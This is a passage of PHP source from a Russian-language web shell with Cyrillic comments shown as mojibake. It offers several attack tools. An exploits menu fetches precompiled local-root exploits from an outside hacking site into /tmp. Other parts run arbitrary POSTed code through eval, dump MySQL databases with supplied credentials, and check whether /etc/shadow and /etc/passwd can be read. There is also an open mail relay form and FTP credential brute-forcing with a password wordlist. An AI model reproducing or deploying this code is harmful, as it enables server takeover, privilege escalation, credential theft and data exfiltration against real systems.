{
|
|
$ret = htmlspecialchars($ret);
|
|
while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
|
|
$stack = explode("\n",$ret);
|
|
$head = explode(" ",$stack[0]);
|
|
unset($stack[0]);
|
|
if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
|
|
if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
|
|
$k = $ps_aux_sort[0];
|
|
if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
|
|
else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
|
|
for($i=0;$i<count($head);$i++)
|
|
{
|
|
if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
|
|
}
|
|
$prcs = array();
|
|
foreach ($stack as $line)
|
|
{
|
|
if (!empty($line))
|
|
{
|
|
echo "<tr>";
|
|
$line = explode(" ",$line);
|
|
$line[10] = join(" ",array_slice($line,10,count($line)));
|
|
$line = array_slice($line,0,11);
|
|
$line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
|
|
$prcs[] = $line;
|
|
echo "</tr>";
|
|
}
|
|
}
|
|
$head[$k] = "<b>".$head[$k]."</b>".$y;
|
|
$head[] = "<b>ACTION</b>";
|
|
$v = $ps_aux_sort[0];
|
|
usort($prcs,"tabsort");
|
|
if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
|
|
$tab = array();
|
|
$tab[] = $head;
|
|
$tab = array_merge($tab,$prcs);
|
|
echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
|
|
foreach($tab as $k)
|
|
{
|
|
echo "<tr>";
|
|
foreach($k as $v) {echo "<td>".$v."</td>";}
|
|
echo "</tr>";
|
|
}
|
|
echo "</table>";
|
|
}
|
|
break;
|
|
// exploits for root...
|
|
case "exploits":
|
|
// thanks to xoce
|
|
$public_site = "http://hackru.info/adm/exploits/public_exploits";
|
|
$private_site = "http://hackru.info/adm/exploits/private_exploits";
|
|
echo"Ýòîò ðàçäåë ñîçäàí ïî ðÿäó ïðè÷èí. Âî-ïåðâûõ, óæå íàäîåëî èñêàòü îäíè è òåæå ýêñïëîèòû, âî-âòîðûõ - êîìïèëèðîâàíèå è èñïðàâëåíèå ñîðöîâ ïîä êîíêðåòíóþ ïëàòôîðìó óæå òîæå íå ïðèíîñèò óäîâîëüñòâèÿ. Âñå ýêñïëîèòû ñêîìïèëèðîâàíû è íàñòðîåíû. Ñàìîìó êîìïèëèðîâàòü áûëî âëîì, ïîýòîìó âîñïîëüçîâàëñÿ ãîòîâûìè :) Âûðàæàþ áëàãîäàðíîñòü xoce (hackru.info)<br><br>
|
|
<a href='?ac=upload&file3=$public_site/m&file2=/tmp'>Local ROOT for linux 2.6.20 - mremap (./m)</a><br>
|
|
<a href='?ac=upload&file3=$public_site/p&file2=/tmp'>Local ROOT for linux 2.6.20 - ptrace (./p)</a><br>
|
|
<a href='?ac=upload&file3=$private_site/brk&file2=/tmp'>BRK - Local Root Unix 2.4.*(./brk)</a><br>
|
|
<a href='?ac=upload&file3=$private_site/sortrace&file2=/tmp'>Traceroute v1.4a5 exploit by sorbo (./sortrace)</a><br>
|
|
<a href='?ac=upload&file3=$private_site/root&file2=/tmp'>Local Root Unix 2.4.* (./root)</a><br>
|
|
<a href='?ac=upload&file3=$private_site/sxp&file2=/tmp'>Sendmail 8.11.x exploit localroot (./sxp)</a><br>
|
|
<a href='?ac=upload&file3=$private_site/ptrace_kmod&file2=/tmp'>Local Root Unix 2.4.* (./ptrace_kmod)</a><br>
|
|
<a href='?ac=upload&file3=$private_site/mr1_a&file2=/tmp'>Local Root Unix 2.4.* (./mr1_a)</a><br><br>";
|
|
echo "Èñïîëüçîâàíèå: çàõîäèòå â /tmp èç bash øåëëà è çàïóñêàéòå ôàéëû çàïóñêà.<br>
|
|
Ïðèìåð: cd /tmp; ./m - âñå, ýêñïëîèò çàïóñòèòñÿ, è åñëè âñå ok, òî âû ïîëó÷èòå ïðàâà root'a!<br>
|
|
Åñëè çäåñü íå îêàçàëîñü ïîäõîäÿùåãî ýêñïëîèòà, òî ïîñåòèòå <a href=http://www.web-hack.ru/exploits/>www.web-hack.ru/exploits/</a> è <a href=http://security.nnov.ru>security.nnov.ru</a>.";
|
|
|
|
break;
|
|
case "damp":
|
|
|
|
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
|
|
if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
|
|
$db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
|
|
if($db)
|
|
{
|
|
|
|
if(@mysql_select_db($_POST['mysql_db'],$db))
|
|
{
|
|
// èíôà î äàìïå
|
|
$sql1 = "# MySQL dump created by NRWS\r\n";
|
|
$sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n";
|
|
$sql1 .= "# ---------------------------------\r\n";
|
|
$sql1 .= "# date : ".date ("j F Y g:i")."\r\n";
|
|
$sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
|
|
$sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
|
|
$sql1 .= "# ---------------------------------\r\n\r\n";
|
|
|
|
// ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû
|
|
$res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
|
|
$row = @mysql_fetch_row($res);
|
|
$sql1 .= $row[1]."\r\n\r\n";
|
|
$sql1 .= "# ---------------------------------\r\n\r\n";
|
|
|
|
$sql2 = '';
|
|
|
|
// ïîëó÷àåì äàííûå òàáëèöû
|
|
$res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
|
|
if (@mysql_num_rows($res) > 0) {
|
|
while ($row = @mysql_fetch_assoc($res)) {
|
|
$keys = @implode("`, `", @array_keys($row));
|
|
$values = @array_values($row);
|
|
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
|
$values = @implode("', '", $values);
|
|
$sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
|
|
}
|
|
$sql2 .= "\r\n# ---------------------------------";
|
|
}
|
|
echo "<center><b>Ãîòîâî! Äàìï ïðîøåë óäà÷íî!</b></center>";
|
|
// ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð
|
|
if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
|
|
else { echo $sql1.$sql2; }
|
|
} // end if(@mysql_select_db($_POST['mysql_db'],$db))
|
|
|
|
else echo "Òàêîé ÁÄ íåò!";
|
|
@mysql_close($db);
|
|
} // end if($db)
|
|
else echo "Íåò êîííåêòà c ñåðâåðîì!";
|
|
} // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
|
|
else if(!empty($_POST['dif'])&&!$fp) { echo "ÎØÈÁÊÀ, íåò ïðàâ çàïèñè â ôàéë!"; }
|
|
|
|
break;
|
|
// SQL Attack
|
|
case "sql":
|
|
echo "<form name='mysql_dump' action='?ac=damp' method='post'>";
|
|
echo " Áàçà: <input type=text name=mysql_db size=15 value=";
|
|
echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
|
|
echo ">";
|
|
echo " Òàáëèöà: <input type=text name=mysql_tbl size=15 value=";
|
|
echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
|
|
echo ">";
|
|
echo " Ëîãèí: <input type=text name=mysql_l size=15 value=";
|
|
echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
|
|
echo ">";
|
|
echo " Ïàðîëü: <input type=text name=mysql_p size=15 value=";
|
|
echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
|
|
echo ">";
|
|
echo "<input type=hidden name=dir size=85 value=".$dir.">";
|
|
echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
|
|
echo "<br> Ñîõðàíèòü äàìï â ôàéëå: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
|
|
echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
|
|
echo ">";
|
|
echo "<input type=submit name=submit value=Ñîõðàíèòü>" ;
|
|
echo "</font>";
|
|
echo "</form>";
|
|
print "<tr><td>";
|
|
###
|
|
|
|
@$php_self=$_GET['PHP_SELF'];
|
|
@$from=$_GET['from'];
|
|
@$to=$_GET['to'];
|
|
@$adress=$_POST['adress'];
|
|
@$port=$_POST['port'];
|
|
@$login=$_POST['login'];
|
|
@$pass=$_POST['pass'];
|
|
@$adress=$_GET['adress'];
|
|
@$port=$_GET['port'];
|
|
@$login=$_GET['login'];
|
|
@$pass=$_GET['pass'];
|
|
if(!isset($adress)){$adress="localhost";}
|
|
if(!isset($login)){$login="root";}
|
|
if(!isset($pass)){$pass="";}
|
|
if(!isset($port)){$port="3306";}
|
|
if(!isset($from)){$from=0;}
|
|
if(!isset($to)){$to=50;}
|
|
?>
|
|
|
|
<body vLink=white>
|
|
<font color=black face=verdana size=1>
|
|
<form> <? if(!@$conn){ ?>
|
|
<table><tr><td valign=top>
|
|
<input type=hidden name=ac value=sql>
|
|
<tr><td valign=top>Õîñò: </tr><td><input name=adress value='<?=$adress?>' size=20></td></tr>
|
|
<tr><td valign=top>Ïîðò: </tr><td><input name=port value='<?=$port?>' size=6></td></tr>
|
|
<tr><Td valign=top>Ëîãèí: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
|
|
<tr><Td valign=top>Ïàðîëü: </td><td> <input name=pass value='<?=$pass?>' size=10>
|
|
<input type=hidden name=p value=sql></td></tr>
|
|
<tr><td></td><td><input type=submit name=conn value=Ïîäêëþ÷èòüñÿ></form></td></tr><?}?>
|
|
<tr><td valign=top><? if(@$conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td>
|
|
</td></tr>
|
|
</table>
|
|
<table width=100%><tr><td>
|
|
<?
|
|
@$conn=$_GET['conn'];
|
|
@$adress=$_GET['adress'];
|
|
@$port=$_GET['port'];
|
|
@$login=$_GET['login'];
|
|
@$pass=$_GET['pass'];
|
|
if($conn){
|
|
|
|
$serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ÎØÈÁÊÀ: ".mysql_error());
|
|
if($serv){$status="Ïîäêëþ÷åí. :: <a href='$php_self?conn=0'>Âûéòè èç áàçû</a>";}else{$status="Îòêëþ÷åí.";}
|
|
print "<b><font color=green>Ñòàòóñ: $status<br><br>";
|
|
print "<table cellpadding=0 cellspacing=0><tr><td valign=top>";
|
|
print "<font color=red>[Òàáëèöû]</font><Br><font color=white>";
|
|
$res = mysql_list_dbs($serv);
|
|
while ($str=mysql_fetch_row($res)){
|
|
print "<b><a href='$php_self?ac=sql&base=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
|
|
@$tc++;
|
|
}
|
|
$pro=" ";
|
|
@$base=$_GET['base'];
|
|
@$db=$_GET['db'];
|
|
print "<font color=red>[Âñåãî òàáëèö: $tc]</font><br>$pro";
|
|
if($base){
|
|
print "<div align=left><font color=green>Òàáëèöà: [$tbl]</div></font><br>";
|
|
$result=mysql_list_tables($db);
|
|
while($str=mysql_fetch_array($result)){
|
|
$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
|
|
$records=mysql_fetch_array($c);
|
|
print "<font color=red>[$records[0]]</font> <a href='$php_self?ac=sql&inside=1&p=sql&vn=$str[0]&base=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
|
|
mysql_free_result($c);
|
|
}
|
|
} #end base
|
|
|
|
@$vn=$_GET['vn'];
|
|
print "</td><td valign=top>";
|
|
print "<font color=green>Áàçà äàííûõ: $db => $vn</font>";
|
|
@$inside=$_GET['inside'];
|
|
@$tbl=$_GET['tbl'];
|
|
if($inside){
|
|
print "<table cellpadding=0 cellspacing=1><tr>";
|
|
|
|
mysql_select_db($db) or die(mysql_error());
|
|
$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
|
|
$cfa=mysql_fetch_array($c);
|
|
mysql_free_result($c);
|
|
print " <br>";
|
|
print "
|
|
Âñåãî: $cfa[0]<form>
|
|
<input type=hidden name=ac value=sql>
|
|
Îò: <input name=from size=3 value=0>
|
|
Äî: <input name=to size=3 value=$cfa[0]>
|
|
<input type=submit name=show value=Ïîêàçàòü>
|
|
<input type=hidden name=inside value=1>
|
|
<input type=hidden name=vn value=$vn>
|
|
<input type=hidden name=db value=$db>
|
|
<input type=hidden name=login value=$login>
|
|
<input type=hidden name=pass value=$pass>
|
|
<input type=hidden name=adress value=$adress>
|
|
<input type=hidden name=conn value=1>
|
|
<input type=hidden name=base value=1>
|
|
<input type=hidden name=p value=sql>
|
|
<input type=hidden name=tbl value=$tbl>
|
|
[<a href='$php_self?ac=sql&getdb=1&to=$cfa[0]&inside=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&base=1&p=sql&tbl=$tbl'>Çàãðóçèòü</a>]
|
|
</form>";
|
|
@$vn=$_GET['vn'];
|
|
@$from=$_GET['from'];
|
|
@$to=$_GET['to'];
|
|
@$from=$_GET['from'];
|
|
@$to=$_GET['to'];
|
|
if(!isset($from)){$from=0;}
|
|
if(!isset($to)){$to=50;}
|
|
$query = "SELECT * FROM $vn LIMIT $from,$to";
|
|
$result = mysql_query($query);
|
|
for ($i=0;$i<mysql_num_fields($result);$i++){
|
|
$name=mysql_field_name($result,$i);
|
|
print "<td> </td><td bgcolor=#BCE0FF> $name </td> ";
|
|
}
|
|
print "</tr>";
|
|
while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
|
|
print "<tr>";
|
|
foreach ($mn as $come=>$lee) {
|
|
$nst_inside=htmlspecialchars($lee);
|
|
print "<td> </td><td bgcolor=silver>$nst_inside</td>\r\n";
|
|
} print "</tr>";
|
|
}
|
|
mysql_free_result($result);
|
|
print "</table>";
|
|
|
|
} #end inside
|
|
print "</td></tr></table>";
|
|
} # end $conn
|
|
|
|
|
|
### end of sql
|
|
print "</tr></td></table> </td></tr></table>";
|
|
print $copyr;
|
|
die;
|
|
|
|
|
|
break;
|
|
|
|
//PHP Eval Code execution
|
|
case "eval":
|
|
|
|
echo <<<HTML
|
|
<b>Èñïîëíåíèå php-êîäà (áåç "< ? ? >")</b>
|
|
<table>
|
|
<form method="POST" action="$self">
|
|
<input type="hidden" name="ac" value="eval">
|
|
<tr>
|
|
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
|
|
</tr>
|
|
<tr>
|
|
<td><input type="submit" value="Enter"></td>
|
|
$tend
|
|
HTML;
|
|
|
|
if (isset($_POST['ephp'])){
|
|
eval($_POST['ephp']);
|
|
}
|
|
break;
|
|
|
|
// SEND MAIL
|
|
case "sendmail":
|
|
echo <<<HTML
|
|
<table>
|
|
<form method="POST" action="$self">
|
|
<input type="hidden" name="ac" value="sendmail">
|
|
<tr>Îò êîãî: <br>
|
|
<input type="TEXT" name="frommail">
|
|
<br>Êîìó:<br> <input type="TEXT" name="tomailz">
|
|
<br>Òåìà: <br><input type="TEXT" name="mailtema">
|
|
<br>Òåêñò: <br>
|
|
<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
|
|
</tr>
|
|
<tr>
|
|
<td><input type="submit" value="Îòïðàâèòü" name="submit"></td><form>
|
|
$tend
|
|
HTML;
|
|
// íèêàêàÿ ïðîâåðêà íå äåëàåòñÿ, à çà÷åì ? =)
|
|
if (isset($submit))
|
|
{
|
|
|
|
mail($tomailz,$mailtema,$mailtext,"From: $frommail");
|
|
echo "<h2>Ñîîáùåíèå îòïðàâëåíî!</h2>";
|
|
}
|
|
break;
|
|
|
|
|
|
// Èíôîðìàöèÿ î ñèñòåìå
|
|
case "info":
|
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
|
|
{
|
|
$safemode = true;
|
|
$hsafemode = "<font color=\"red\">Âêëþ÷åíî</font>";
|
|
}
|
|
else {$safemode = false; $hsafemode = "Îòêëþ÷åíî</font>";}
|
|
/* display information */
|
|
echo "<b>[ Èíôîðìàöèÿ î ñèñòåìå ]</b><br>";
|
|
echo "<b>Õîñò:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
|
|
echo "<b>IP ñåðâåðà:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
|
|
echo " <b>Ñåðâåð: </b>".$_SERVER['SERVER_SIGNATURE']." ";
|
|
echo "<b>OC:</b> ".exec("uname -a")."(";
|
|
print "".php_uname()." )<br>\n";
|
|
echo "<b>Ïðîöåññîð:</b> ".exec("cat /proc/cpuinfo | grep GHz")."<br>";
|
|
echo "<b>Ïðèâèëåãèè: </b>".exec("id")."<br>";
|
|
echo "<b>Âñåãî ìåñòà: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "<b>Ñâîáîäíî</b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB <br>";
|
|
echo "<b>Òåêóùèé êàòàëîã:</b>".exec("pwd")."";
|
|
echo " <br><b>Òåêóøèé web-ïóòü: </b>".@$_SERVER['PHP_SELF']." ";
|
|
echo "<br><b>Òâîé IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
|
|
echo "<b>PHP version: </b>".phpversion()."<BR>";
|
|
echo "<b> ID âëàäåëüöà ïðîöåñà: </b>".get_current_user()."<BR>";
|
|
echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
|
|
if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
|
|
print '<b>Åñòü äîñòóï ê /etc/passwd! </b><br>';
|
|
}
|
|
if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
|
|
print '<b>Åñòü äîñòóï ê /etc/shadow!</b> <br>';
|
|
}
|
|
if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
|
|
print '<b>Åñòü äîñòóï ê /etc/shadow-!</b> ';
|
|
}
|
|
if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
|
|
print '<b>Åñòü äîñòóï ê /etc/master.passwd! </b><br>';
|
|
}
|
|
if(isset($_POST['th']) && $_POST['th']!=''){
|
|
chdir($_POST['th']);
|
|
};
|
|
if(is_writable('/tmp/')){
|
|
$fp=fopen('/tmp/qq8',"w+");
|
|
fclose($fp);
|
|
print "/tmp - îòêðûòà <br>\n";
|
|
unlink('/tmp/qq8');
|
|
}
|
|
else{
|
|
print "<font color=red>/tmp - íå îòêðûòà</font><br>";
|
|
}
|
|
echo "<b>Áåçîïàñíûé ðåæèì: ".$hsafemode."</b><br>";
|
|
if ($nixpasswd)
|
|
{
|
|
if ($nixpasswd == 1) {$nixpasswd = 0;}
|
|
$num = $nixpasswd + $nixpwdperpage;
|
|
echo "<b>*nix /etc/passwd:</b><br>";
|
|
$i = $nixpasswd;
|
|
while ($i < $num)
|
|
{
|
|
$uid = posix_getpwuid($i);
|
|
if ($uid) {echo join(":",$uid)."<br>";}
|
|
$i++;
|
|
}
|
|
}
|
|
else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
|
|
if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
|
|
if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
|
|
if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Êîíôèãóðàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
|
|
{ echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Êîíôèãóðàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
|
|
if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Êîíôèãóðàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
|
|
if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log </b></u></a></b><br>";}
|
|
break;
|
|
|
|
// Î ñêðèïòå
|
|
case "about":
|
|
|
|
echo "<center><b>Ïðèâåò âñåì!</b><br><br>
|
|
Íàêîíåö-òî NWRS äîñòóïåí â ïåðâîé ñòàáèëüíîé âåðñèè! Äîáàâèëîñü ìíîæåñòâî íîâûõ ïîëåçíûõ âîçìîæíîñòåé. Âñå ôóíêöèè ñêðèïòà ðàáîòàþò è ðàáîòàþò êîððåêòíî. Äîáàâëåíû óíèêàëüíûå èíñòðóìåíòû äëÿ âçëîìà ñåðâåðà.  òî æå âðåìÿ íåò íè÷åãî ëèøíåãî. Âñå, ÷òî çàäóìûâàëîñü - ðåàëèçèðîâàíî. Äóìàþ, êàæäûé íàéäåò â ñêðèïòå ÷òî-òî ïîëåçíîå äëÿ ñåáÿ. Òàêæå çàÿâëÿþ î òîì, ÷òî ÿ çàêðûâàþ ïðîåêò, èáî îí äîñòèã èäåàëà :) Ëþáîé ìîæåò åãî ïðîäîëæèòü, php - îòêðûòûé ÿçûê. Íà ïåðâûõ ïîðàõ ñêðèïò âîîáùå áûë òîëüêî ó íåñêîëüêèõ ÷åëîâåê óçêîãî êðóãà äðóçåé, ïèñàë åãî äëÿ ñåáÿ, èç-çà ñâîåé ïðèðîäíîé ëåíè.
|
|
Íó, è ñïàñèáî ýòèì ëþäÿì: Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (îðôîãðàôèÿ è äèçàéí)... È ìíîãèì äðóãèì... Èõ èäåè î÷åíü ïîìîãëè âîïëîòèòü â æèçíü ñòîëü óíèâåðñàëüíûé èíñòðóìåíò. Îãðîìíîå ñïàñèáî èì!<br><br><b>Ïîìíèòå: èñïîëüçóÿ ýòîò ñêðèïò íà ÷óæèõ ñåðâåðàõ, âû íàðóøàåòå çàêîí :) Òàê ÷òî îñòîðîæíåå.</b></center>";
|
|
echo "<center><br><br><em>Ïîñåòèòå ýòè ñàéòû, è âû âñåãäà áóäåòå â êóðñå ñîáûòèé:</em><br><br>
|
|
<a href='http://www.ru24-team.net'>www.ru24-team.net</a><br><br>
|
|
<a href='http://www.web-hack.ru'>www.web-hack.ru</a><br><br>
|
|
<a href='http://www.rst.void.ru'>www.rst.void.ru</a><br><br>
|
|
<a href='http://www.hackru.info'>www.hackru.info</a><br><br>
|
|
<a href='http://www.realcoding.net'>www.realcoding.net</a><br><br>
|
|
<a href='http://www.ccteam.ru'>www.ccteam.ru</a><br><br>
|
|
Èçâèíÿþñü, åñëè êîãî çàáûë.<br> <em>Àâòîð íå íåñåò îòâåòñòâåííîñòè çà ìàòåðèàëû, ðàçìåùåííûå íà ýòèõ ñàéòàõ, îcîáåííî íà ïîñëåäíåì </em>:)
|
|
<br><br><br><br><br><b>Ñêðèïò ðàñïðîñòðàíÿåòñÿ ïî ëèöåíçèè GNU GPL<br> 22 Èþëÿ 2005 ã. © DreAmeRz<br> e-mail:</b> <a href='mailto:dreamerz@mail.ru'>dreamerz@mail.ru</a><b> ICQ: </b>817312 <b>WEB: </b><a href='http://www.ru24-team.net'>http://www.Ru24-Team.NET</a>";
|
|
break;
|
|
|
|
// ÔÒÏ ïîäáîð ïàðîëåé
|
|
case "ftppass":
|
|
|
|
$filename="/etc/passwd"; // passwd file
|
|
$ftp_server="localhost"; // FTP-server
|
|
|
|
echo "FTP-server: <b>$ftp_server</b> <br><br>";
|
|
|
|
$fp = fopen ($filename, "r");
|
|
if ($fp)
|
|
{
|
|
while (!feof ($fp)) {
|
|
$buf = fgets($fp, 100);
|
|
ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
|
|
$ftp_user_name=$g[1];
|
|
$ftp_user_pass=$g[1];
|
|
$conn_id=ftp_connect($ftp_server);
|
|
$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
|
|
|
|
if (($conn_id) && ($login_result)) {
|
|
echo "<b>Ïîäêëþ÷åíèå login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
|
|
ftp_close($conn_id);}
|
|
else {
|
|
echo $ftp_user_name." - error<br>";
|
|
}
|
|
}}
|
|
break;
|
|
|
|
case "ftp":
|
|
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
|
|
<form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
|
|
<b><a href=?ac=ftppass>Ïðîâåðèòü íà ñâÿçêó login\password</a></b>
|
|
</td></tr>
|
|
|
|
<tr><td align=center class=pagetitle width=150> FTP Host:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='host' size=50></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Login:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='login' size=50></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Êîëëè÷åñòâî ïàðîëåé:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='number' size=10> <1000 pass </td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Ïàðîëü äëÿ ïðîâåðêè:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='testing' size=50>
|
|
<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Ëîã ñîõðàíÿåòñÿ â pass.txt</b></td></tr>
|
|
|
|
|
|
|
|
</form></table>";
|
|
|
|
|
|
function s() {
|
|
$word="qwrtypsdfghjklzxcvbnm";
|
|
return $word[mt_rand(0,strlen($word)-1)];
|
|
}
|
|
|
|
function g() {
|
|
$word="euioam";
|
|
return $word[mt_rand(0,strlen($word)-2)];
|
|
}
|
|
|
|
function name0() { return s().g().s(); }
|
|
function name1() { return s().g().s().g(); }
|
|
function name2() { return s().g().g().s(); }
|
|
function name3() { return s().s().g().s().g(); }
|
|
function name4() { return g().s().g().s().g(); }
|
|
function name5() { return g().g().s().g().s(); }
|
|
function name6() { return g().s().s().g().s(); }
|
|
function name7() { return s().g().g().s().g(); }
|
|
function name8() { return s().g().s().g().g(); }
|
|
function name9() { return s().g().s().g().s().g(); }
|
|
function name10() { return s().g().s().s().g().s().s(); }
|
|
function name11() { return s().g().s().s().g().s().s().g(); }
|
|
|
|
$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
|
|
$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
|
|
|
|
function randword() {
|
|
global $cool;
|
|
$func="name".mt_rand(0,11);
|
|
$func2="name".mt_rand(0,11);
|
|
switch (mt_rand(0,11)) {
|
|
case 0: return $func().mt_rand(5,99);
|
|
case 1: return $func()."-".$func2();
|
|
case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
|
|
case 3: return $func()."!".$func();
|
|
case 4: return randpass(mt_rand(5,12));
|
|
default: return $func();
|
|
}
|
|
|
|
|
|
}
|
|
|
|
function randpass($len) {
|
|
$word="qwertyuiopasdfghjklzxcvbnm1234567890";
|
|
$s="";
|
|
for ($i=0; $i<$len; $i++) {
|
|
$s.=$word[mt_rand(0,strlen($word)-1)];
|
|
}
|
|
return $s;
|
|
}
|
|
if (@unlink("pass.txt") < 0){
|
|
echo "íè÷åãî íåò";
|
|
exit;
|
|
}
|
|
$file="pass.txt";
|
|
if($file && $host && $login){
|
|
$cn=mt_rand(30,30);
|
|
for ($i=0; $i<$cn; $i++) {
|
|
$s=$cool2[$i];
|
|
$f=@fopen(pass.".txt","a+");
|
|
fputs($f,"$s\n");
|
|
}
|
|
|
|
$cnt2=mt_rand(43,43);
|
|
for ($i=0; $i<$cnt2; $i++) {
|
|
$r=$cool[$i];
|
|
$f=@fopen(pass.".txt","a+");
|
|
fputs($f,"$login$r\n");
|
|
}
|
|
$p="$testing";
|
|
$f=@fopen(pass.".txt","a+");
|
|
fputs($f,"$p\n");
|
|
|
|
$cnt3=mt_rand($number,$number);
|
|
for ($i=0; $i<$cnt3; $i++) {
|
|
$u=randword();
|
|
$f=@fopen(pass.".txt","a+");
|
|
fputs($f,"$u\n");
|
|
}
|
|
|
|
if(is_file($file)){
|
|
$passwd=file($file,1000);
|
|
for($i=0; $i<count($passwd); $i++){
|
|
$stop=false;
|
|
$password=trim($passwd[$i]);
|
|
$open_ftp=@fsockopen($host,21);
|
|
if($open_ftp!=false){
|
|
fputs($open_ftp,"user $login\n");
|
|
fputs($open_ftp,"pass $password\n");
|
|
while(!feof($open_ftp) && $stop!=true){
|
|
